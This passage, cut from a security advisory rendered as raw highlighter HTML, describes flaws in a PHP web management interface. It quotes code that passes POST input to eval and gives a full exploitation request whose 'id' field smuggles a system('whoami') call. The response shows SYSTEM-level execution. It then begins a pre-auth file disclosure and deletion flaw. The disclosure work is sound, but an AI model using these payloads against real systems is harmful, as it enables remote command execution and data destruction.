class=\"crayon-s\">&#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[&#8216;rights&#8217;] = &#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;rights&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8221;;&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb5385943372-8\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">evalcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;$permdata-&gt;userpolicies-&gt;permissions-&gt;attr[&#8216;id&#8217;] = &#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;id&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8221;;&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb5385943372-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb5385943372-10\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">eval<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">evalcode<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>No validation is being done on user input before using eval on it.<\/p>\n<p>Exploitation request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cb8023224738\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/get\/settings-set-user-perms.php HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Content-Length: 41  Origin: https:\/\/VULNERABLE_HOST:20394  X-Requested-With: XMLHttpRequest  User-Agent: Mozilla  Content-Type: application\/x-www-form-urlencoded; charset=UTF-8  Accept: *\/*  Referer: https:\/\/VULNERABLE_HOST:20394\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8    id=test&#8217;;system(&#8216;whoami&#8217;);\/\/&amp;rights=admin<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cb8023224738-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cb8023224738-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">perms<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-5\"><span class=\"crayon-v\">Origin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-6\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-7\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">urlencoded<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">charset<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">UTF<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-9\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-10\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-11\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-12\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cb8023224738-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cb8023224738-14\"><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">test<\/span><span class=\"crayon-s\">&#8216;;system(&#8216;<\/span><span class=\"crayon-i\">whoami<\/span>&#8216;<span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-c\">\/\/&amp;rights=admin<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>Response:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cbb893778491\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> nt authoritysystem  ({&#8220;success&#8221;:&#8221;false&#8221;,          &#8220;vipperResult&#8221;:&#8221;-2700&#8243;,          &#8220;resultDesc&#8221;:&#8221;ER_TPM_AUTHENTICATION_FAILED&#8221;          })<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbb893778491-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbb893778491-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbb893778491-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-1\"><span class=\"crayon-e\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">authority<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-e\">system<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbb893778491-2\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;success&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;false&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;vipperResult&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;-2700&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbb893778491-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;resultDesc&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ER_TPM_AUTHENTICATION_FAILED&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbb893778491-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><em>3. Pre-auth remote arbitrary file disclosure\/deletion in https:\/\/host:20394\/get\/manage-get-stations-add.php<\/em><br \/> Requirements: No authentication is required to exploit this vulnerability, requires combination with another minor vulnerability to be exploitable.<\/p>\n<p>Restrictions: The file disclosed will be deleted after that, unless the &#8220;exploiter&#8221; manages somehow to race the PHP code before that happens (I doubt).<\/p>\n<p>Vulnerable code, line 74 to 76:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cbe866845756\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">   case &#8220;download&#8221;:    \texport_download_file($_GET[&#8216;key&#8217;]);    \tbreak;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbe866845756-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cbe866845756-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cbe866845756-3\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbe866845756-1\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;download&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cbe866845756-2\"><span class=\"crayon-h\">&nbsp;&nbsp;\t<\/span><span class=\"crayon-e\">export_download_file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;key&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cbe866845756-3\"><span class=\"crayon-h\">&nbsp;&nbsp;\t<\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Where export_download_file is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc0266046815\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> function export_download_file($filename) {    $path = ini_get(&#8216;upload_tmp_dir&#8217;).&#8217;\\&#8217;.$filename;    $filename = file_get_contents($path);    ob_end_clean();    header(&#8216;Content-type: application\/download&#8217;);    header(&#8216;Content-Disposition: attachment; filename=&#8221;export.csv&#8221;&#8216;);    header(&#8216;Content-transfer-encoding: binary&#8217;);    header(&#8216;Content-Length: &#8216;.filesize($filename));    readfile($filename);    unlink($path);    unlink($filename);  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc0266046815-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc0266046815-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-1\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">export_download_file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ini_get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;upload_tmp_dir&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;\\&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_get_contents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ob_end_clean<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-type: application\/download&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-Disposition: attachment; filename=&#8221;export.csv&#8221;&#8216;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-transfer-encoding: binary&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-8\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-Length: &#8216;<\/span><span 